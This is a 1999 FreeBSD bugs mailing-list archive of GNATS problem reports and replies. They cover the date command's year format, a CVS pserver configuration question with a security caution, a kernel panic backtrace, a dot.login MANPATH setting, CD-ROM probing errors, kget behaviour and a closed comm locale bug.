FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/14472: date for Y#K Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14472 >Category: bin >Synopsis: date for Y#K >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Oct 23 06:47:22 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Jin Guojun (FTG staff) >Release: FreeBSD 3.3-RELEASE i386 >Organization: >Environment: FreeBSD >Description: `date` command does not take thousand/hundred digits. Since we are fixing Y2K problem, why don't we just simply fix YnK problem at once, so no one has to fix such problem in the next century, and for the rest centuries :-) >How-To-Repeat: # date 199910221913.15 date: illegal time format usage: date [-nu] [-d dst] [-r seconds] [-t west] [-v[+|-]val[ymwdHMS]] ... [-f fmt date | [[[[yy]mm]dd]HH]MM[.ss]] [+format] # date 9910221913.30 Fri Oct 22 19:13:30 PDT 1999 # uname -rsm FreeBSD 3.3-RELEASE i386 # date 210001010100 date: illegal time format usage: date [-nu] [-d dst] [-r seconds] [-t west] [-v[+|-]val[ymwdHMS]] ... [-f fmt date | [[[[yy]mm]dd]HH]MM[.ss]] [+format] # date 0110221913.30 Mon Oct 22 19:13:30 PDT 2001 # date 9910221917.40 Fri Oct 22 19:17:40 PDT 1999 >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Oct 23 9:10: 7 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 63C0614C2F for ; Sat, 23 Oct 1999 09:10:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA96846; Sat, 23 Oct 1999 09:10:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Sat, 23 Oct 1999 09:10:02 -0700 (PDT) Message-Id: <199910231610.JAA96846@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Nate Williams Subject: Re: conf/14463: cvs pserver does not work with out-of-the-box configuration Reply-To: Nate Williams Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR conf/14463; it has been noted by GNATS. From: Nate Williams To: timj@systembureau.com Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: conf/14463: cvs pserver does not work with out-of-the-box configuration Date: Sat, 23 Oct 1999 10:07:10 -0600 > >Number: 14463 > >Category: conf > >Synopsis: cvs pserver does not work with out-of-the-box configuration > >Confidential: no > >Severity: non-critical > >Priority: low > >Responsible: freebsd-bugs > >State: ope > >Quarter: > >Keywords: > >Date-Required: > >Class: change-request > >Submitter-Id: current-users > >Arrival-Date: Sat Oct 23 06:47:18 PDT 1999 > >Closed-Date: > >Last-Modified: > >Originator: Tim Jansen > >Release: 3.3 > >Organization: > >Environment: > FreeBSD fizz.systembureau.com 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999 jkh@highwing.cdrom.com:/usr/src/sys/compile/GENERIC i386 > > >Description: > I installed the 3.3 distribution (on a P200 no-name machine) and > wanted to install the cvs pserver. So I looked in the inetd.conf > file and found the following cvspserver lines. > # > # CVS servers - for master CVS repositories only! > # > #cvspserver stream tcp nowait root /usr/bin/cvs cvs pserver > #cvs stream tcp nowait root /usr/bin/cvs cvs kserver > > > I uncommmented them, restarted inetd of course, but when I tried to log into > the server, i get the following message after entering my password: > > [timon:~]cvs login > (Logging in to timj@fizz.sfabrik.de) > CVS password: > Server configuration missing --allow-root in inetd.conf > cvs [login aborted]: authorization failed: server fizz.sfabrik.de rejected access > > The "Server configuration..." message seems to come from cvs. When I telnet to > the server, inetd accepts the TCP connection and I can talk to > CVS. CVS needs to be configured correctly. Note, *UNLESS* you know what you are doing (and it takes a bit of work), 'pserver' mode becomes a trivial way to break root on your box. FreeBSD should *NOT* allow pserver mode to be setup out of the box if security is at all a concern. Please read the cvs man pages, as well as the security pages on www.cylic.com to discuss the security issues. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Oct 23 13: 0: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E7A9A14C25 for ; Sat, 23 Oct 1999 13:00:00 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA15918; Sat, 23 Oct 1999 13:00:00 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from feral.com (feral.com [192.67.166.1]) by hub.freebsd.org (Postfix) with ESMTP id 4961614C25 for ; Sat, 23 Oct 1999 12:55:57 -0700 (PDT) (envelope-from mjacob@feral.com) Received: from quarm.feral.com (quarm [192.67.166.252]) by feral.com (8.8.7/8.8.7) with ESMTP id MAA22966 for ; Sat, 23 Oct 1999 12:55:55 -0700 Received: (from mjacob@localhost) by quarm.feral.com (8.9.3/8.9.3) id MAA00406; Sat, 23 Oct 1999 12:55:56 -0700 (PDT) (envelope-from mjacob@mailhost.feral.com) Message-Id: <199910231955.MAA00406@quarm.feral.com> Date: Sat, 23 Oct 1999 12:55:56 -0700 (PDT) From: Matthew Jacob Reply-To: mjacob@feral.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/14486: repeated arrival/departure of disks leads to panic in dscheck Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14486 >Category: kern >Synopsis: repeated arrival/departure of disks leads to panic in dscheck >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Oct 23 13:00:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Matthew Jacob >Release: FreeBSD 4.0-19991022-CURRENT i386 >Organization: Feral Software >Environment: 2xPPro x86. >Description: repeated arrivals/departures of disks, sometimes with the labels changed, yields a panic: Stopped at dscheck+0x53: movl 0x10(%edx),%esi db> t dscheck(c3327a38,0) at dscheck+0x53 diskstrategy(c3327a38,c0ae4780,200,c0a4db80,0) at diskstrategy+0xad readdisklabel(c0ae4780,c0a51600,c0a4db80,c0b1e8e0,c0a4db80) at readdisklabel+0x5 3 dsopen(c0a4db80,2000,0,c0b1e8ec,c0b1e8f0) at dsopen+0x248 diskopen(c0a4db80,1,2000,c7c77800,0) at diskopen+0xdb spec_open(c86afe08,c86afde0,c020ecd9,c86afe08,c86afe7c) at spec_open+0x154 spec_vnoperate(c86afe08,c86afe7c,c0190ace,c86afe08,0) at spec_vnoperate+0x15 ufs_vnoperatespec(c86afe08,0,c86aff80,fffffffc,100) at ufs_vnoperatespec+0x15 vn_open(c86afed8,1,dfd,c7c77800,3) at vn_open+0x37e open(c7c77800,c86aff80,1,1b0a,bfbfdad1) at open+0xbb syscall(2f,2f,2f,bfbfdad1,1b0a) at syscall+0x1b1 Xsyscall() at Xsyscall+0x3a with Supervisor page niot present... This should be enough information for the responsible designers to do the appropriate hardening. >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Oct 23 14: 0: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3D89E14E61 for ; Sat, 23 Oct 1999 14:00:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA19607; Sat, 23 Oct 1999 14:00:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id AFD3414DE3; Sat, 23 Oct 1999 13:51:21 -0700 (PDT) Message-Id: <19991023205121.AFD3414DE3@hub.freebsd.org> Date: Sat, 23 Oct 1999 13:51:21 -0700 (PDT) From: nori@tlab.is.uec.ac.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: conf/14487: Please Change "/usr/share/skel/dot.login" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14487 >Category: conf >Synopsis: Please Change "/usr/share/skel/dot.login" >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Oct 23 14:00:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Norihiko Ishitani >Release: FreeBSD 3.3-STABLE >Organization: Univ. of Electro-Communications >Environment: [ advance ]~ >uname -a FreeBSD advance.tlab.is.uec.ac.jp 3.3-STABLE FreeBSD 3.3-STABLE #1: Sat Oct 2 19:31:54 JST 1999 nori@advance.tlab.is.uec.ac .jp:/usr/src/sys/compile/OMEGA3 i386 [ advance ]~ > >Description: Manual say. Don't need to set the MANPATH. But default .login(/usr/share/skel/dot.login), set MANPATH=... . Why? I think, We must modifiy dot.login. #man manpath Manpath is used by man(1) to determine the search path, so users normally don't need to set the MANPATH environment variable directly. >How-To-Repeat: #cat /usr/share/skel/dot.login setenv MANPATH "/usr/share/man:/usr/X11R6/man:/usr/local/man" >Fix: unsetenv MANPATH at dot.login >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Oct 23 15:50: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id F2F8314A12 for ; Sat, 23 Oct 1999 15:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA00717; Sat, 23 Oct 1999 15:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Sat, 23 Oct 1999 15:50:01 -0700 (PDT) Message-Id: <199910232250.PAA00717@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Matt Behrens Subject: Re: kern/12274: cd mount problems Reply-To: Matt Behrens Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/12274; it has been noted by GNATS. From: Matt Behrens To: freebsd-gnats-submit@freebsd.org, ikappa@essex.ac.uk Cc: Subject: Re: kern/12274: cd mount problems Date: Sat, 23 Oct 1999 18:32:06 -0400 (EDT) I have similar problems with another Aztech drive, the AZT 26803I SE. Instead of probing correctly on bootup, I would get a few atapi0.1: unknown phase errors. In addition, on a soft reboot, the system would hang momentarily on the wdc0 scan (no unknown phase errors this time around) and refuse to mount / (which is on wd0s1a) due to timeout errors. Cold-booting the system would allow mounting again but the drive still would not be probed. I seem to recall this drive working in the 2.2 tree as well, though it was in my parts bin for awhile, dragged out so a machine could have a drive, so I cannot say for certain. I do have an old copy of 2.1.5 lying around, maybe I'll try that. :-) I know this is skimpy. I shall try to get more information at a later date. But I thought it would be worth a "me too!" at this point. Matt Behrens Owner/Administrator, zigg.com Chief Engineer, Nameless IRC Network To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Oct 23 16: 0: 2 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C68E814C14 for ; Sat, 23 Oct 1999 16:00:00 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA01145; Sat, 23 Oct 1999 16:00:00 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 6087614A12; Sat, 23 Oct 1999 15:54:01 -0700 (PDT) Message-Id: <19991023225401.6087614A12@hub.freebsd.org> Date: Sat, 23 Oct 1999 15:54:01 -0700 (PDT) From: qsoft@arrakis.es To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/14488: kget doesn´t write the key word "enable" in the kernel.conf Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14488 >Category: misc >Synopsis: kget doesn´t write the key word "enable" in the kernel.conf >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Oct 23 16:00:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Guillermo Hernández >Release: 3.3 STABLE / 3.3 RELEASE >Organization: Query Soft, S.L. >Environment: >Description: As we can read in the "man kget" you can use it to write down in the kernel.conf the changes you want to activate made by the "boot -c". When you configure the pnp devices and try to write it into the /boot/kernel.conf it doesn't set them as enable.. and you can drive crazy if you dont see this. >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Oct 23 20:46:17 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 12F1E1502E; Sat, 23 Oct 1999 20:46:16 -0700 (PDT) (envelope-from ache@FreeBSD.org) Received: (from ache@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA14967; Sat, 23 Oct 1999 20:46:16 -0700 (PDT) (envelope-from ache@FreeBSD.org) Date: Sat, 23 Oct 1999 20:46:16 -0700 (PDT) From: Message-Id: <199910240346.UAA14967@freefall.freebsd.org> To: grg@philol.msu.ru, ache@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/11221: comm doesn't obey current locale collation Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: comm doesn't obey current locale collation State-Changed-From-To: open->closed State-Changed-By: ache State-Changed-When: Sat Oct 23 20:45:36 PDT 1999 State-Changed-Why: Fixed. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message